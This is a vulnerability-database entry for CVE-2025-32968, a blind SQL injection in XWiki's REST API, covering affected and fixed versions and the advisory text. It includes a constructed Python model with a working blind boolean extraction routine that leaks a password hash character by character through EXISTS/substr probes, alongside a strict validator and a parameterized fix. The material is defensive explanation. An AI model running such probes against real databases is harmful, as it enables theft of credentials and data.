CVE-2025-32968
Published: 23 April 2025
Summary
CVE-2025-32968 is a high-severity SQL Injection (CWE-89) vulnerability in XWiki. Its CVSS 4.0 base score is 8.6 (High).
Operationally, it ranks in the top 36.8% of CVEs by EPSS exploit likelihood, is not currently listed in the CISA KEV catalog, and a public proof-of-concept is referenced.
Deeper analysis
XWiki is a generic wiki platform. CVE-2025-32968 is a blind SQL injection vulnerability present in XWiki versions from 1.6-milestone-1 up to and including 15.10.15, 16.4.5 and 16.10.0. The flaw allows a user holding SCRIPT right to escape the HQL execution context of a REST API endpoint and inject arbitrary SQL statements against the backend database. The issue is tracked under CWE-89 and carries a CVSS 4.0 score of 8.6.
An attacker with SCRIPT right can exploit the weakness to retrieve sensitive data such as password hashes or, depending on the database backend, issue UPDATE, INSERT or DELETE statements. Because the injection is reached through an authenticated API path, the attacker needs no user interaction and no special network position; the only precondition is the SCRIPT right.
The GitHub Security Advisory GHSA-g9jj-75mx-wjcx and the linked XWiki Jira ticket XWIKI-22718 state that the vulnerability is fixed in releases 15.10.16, 16.4.6 and 16.10.1. The fix applies to this REST API the same strict query validation already used for complete SELECT statements, so some valid but complex queries may now require their author to hold PROGRAMMING right. No workaround other than upgrading is provided.
EPSS for the CVE rose from a low baseline to a recorded peak of 0.0123 (about 1.2%), indicating that exploitation interest increased after public disclosure.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-12169
Vulnerability details
XWiki is a generic wiki platform. In versions starting from 1.6-milestone-1 to before 15.10.16, 16.4.6, and 16.10.1, it is possible for a user with SCRIPT right to escape from the HQL execution context and perform a blind SQL injection to execute arbitrary SQL statements on the database backend. Depending on the used database backend, the attacker may be able to not only obtain confidential information such as password hashes from the database, but also execute UPDATE/INSERT/DELETE queries. This issue has been patched in versions 16.10.1, 16.4.6 and 15.10.16. There is no known workaround, other than upgrading XWiki. The protection added to this REST API is the same as the one used to validate complete select queries, making it more consistent. However, while the script API always had this protection for complete queries, it's important to note that it's a very strict protection and some valid, but complex, queries might suddenly require the author to have programming right.
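The following is an added illustration, not XWiki's code: it does not reproduce XWiki's HQL layer, the affected REST endpoint or its rights model, and SQLite stands in for the real database. It models the three things the deeper analysis and the vulnerability details describe: a caller-supplied filter fragment concatenated onto a fixed query, the blind boolean oracle an attacker builds on that to read a password hash out of a table the query never mentioned, and a strict allow-list validator of the kind the fix note describes, which blocks the probe but also rejects a legitimate subquery unless the caller holds the equivalent of programming right. The table names, the sample hash and the validator's allow-list are constructed assumptions.

```python
"""Constructed model of the CWE-89 pattern behind CVE-2025-32968 (not XWiki code).

SQLite replaces the real backend; table names, the sample hash and the allow-list
are assumptions made for this example only.
"""
import re
import sqlite3
import string

SAMPLE_HASH = "hash:5f4dcc3b"                       # constructed credential to be leaked
PREFIX = "SELECT fullname FROM xwikidoc WHERE "     # fixed query head; fragment appended verbatim


def make_db() -> sqlite3.Connection:
    """Toy schema: a documents table plus a users table holding a password hash."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE xwikidoc (fullname TEXT)")
    con.execute("CREATE TABLE xwikiusers (name TEXT, password TEXT)")
    con.executemany("INSERT INTO xwikidoc VALUES (?)",
                    [("Main.WebHome",), ("Sandbox.WebHome",)])
    con.execute("INSERT INTO xwikiusers VALUES (?, ?)", ("admin", SAMPLE_HASH))
    return con


def run_fragment_vulnerable(con: sqlite3.Connection, fragment: str) -> list:
    """Vulnerable shape: the caller's WHERE fragment is spliced into the query text."""
    return [row[0] for row in con.execute(PREFIX + fragment)]


def blind_extract(con: sqlite3.Connection, length: int) -> str:
    """Blind boolean injection: the only signal is whether any row comes back.

    Each probe smuggles an EXISTS subquery against a table the prefix never names
    and tests one character of the hash at a time.
    """
    alphabet = string.digits + string.ascii_lowercase + ":"
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            probe = (f"1=1 AND EXISTS(SELECT 1 FROM xwikiusers WHERE name='admin' "
                     f"AND substr(password,{pos},1)='{ch}')")
            if run_fragment_vulnerable(con, probe):    # rows returned => guess is right
                recovered += ch
                break
        else:
            raise ValueError(f"no alphabet character matched at position {pos}")
    return recovered


# Strict allow-list validator (an assumption, modelled on the fix note): only tokens a
# plain filter on the prefix table needs are accepted. Subqueries, other tables,
# functions, comments and statement separators all fail.
TOKEN = re.compile(r"'(?:[^']|'')*'|\d+|[A-Za-z_][A-Za-z0-9_]*|[=<>!]=?|[(),]|\s+")
ALLOWED_WORDS = {"and", "or", "not", "like", "in", "is", "null", "fullname"}


def fragment_is_safe(fragment: str) -> bool:
    """True only if the fragment is non-empty and every token is on the allow-list."""
    if not fragment.strip():
        return False
    pos = 0
    while pos < len(fragment):
        m = TOKEN.match(fragment, pos)
        if m is None:
            return False    # ';', '--', '/*', an unbalanced quote, ...
        tok = m.group(0)
        if (tok[0].isalpha() or tok[0] == "_") and tok.lower() not in ALLOWED_WORDS:
            return False    # SELECT, EXISTS, UNION, substr, xwikiusers, ... land here
        pos = m.end()
    return True


def run_fragment_hardened(con: sqlite3.Connection, fragment: str,
                          has_programming_right: bool = False) -> list:
    """Hardened shape: a fragment that fails validation needs an elevated right to run.

    This is the trade-off the advisory notes: a legitimate but complex fragment
    (for example one with a subquery) is also blocked for callers without that right.
    """
    if not fragment_is_safe(fragment) and not has_programming_right:
        raise PermissionError("fragment rejected by strict validator")
    return run_fragment_vulnerable(con, fragment)


def hardened_rejects(con: sqlite3.Connection, fragment: str,
                     has_programming_right: bool = False) -> bool:
    """Helper for checks: does the hardened path refuse this fragment?"""
    try:
        run_fragment_hardened(con, fragment, has_programming_right)
    except PermissionError:
        return True
    return False


def lookup_by_name(con: sqlite3.Connection, name: str) -> list:
    """Non-injectable shape for the common case: user data travels as a bound parameter."""
    return [row[0] for row in
            con.execute("SELECT fullname FROM xwikidoc WHERE fullname = ?", (name,))]


if __name__ == "__main__":
    db = make_db()
    print("leaked via blind oracle:", blind_extract(db, len(SAMPLE_HASH)))
    print("probe blocked by validator:",
          hardened_rejects(db, "1=1 AND EXISTS(SELECT 1 FROM xwikiusers)"))
```

Note that the hardened path still concatenates once the caller is trusted, which is why the allow-list has to stay strict: widening it to admit the "valid but complex" cases is exactly where the subquery in the probe would slip back in. Where the filter is a fixed-shape lookup, the bound-parameter form in `lookup_by_name` removes the injection surface entirely.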
- CWE(s): CWE-89 (Improper Neutralization of Special Elements used in an SQL Command, 'SQL Injection')
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls
Likely Mitigating Controls AI
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.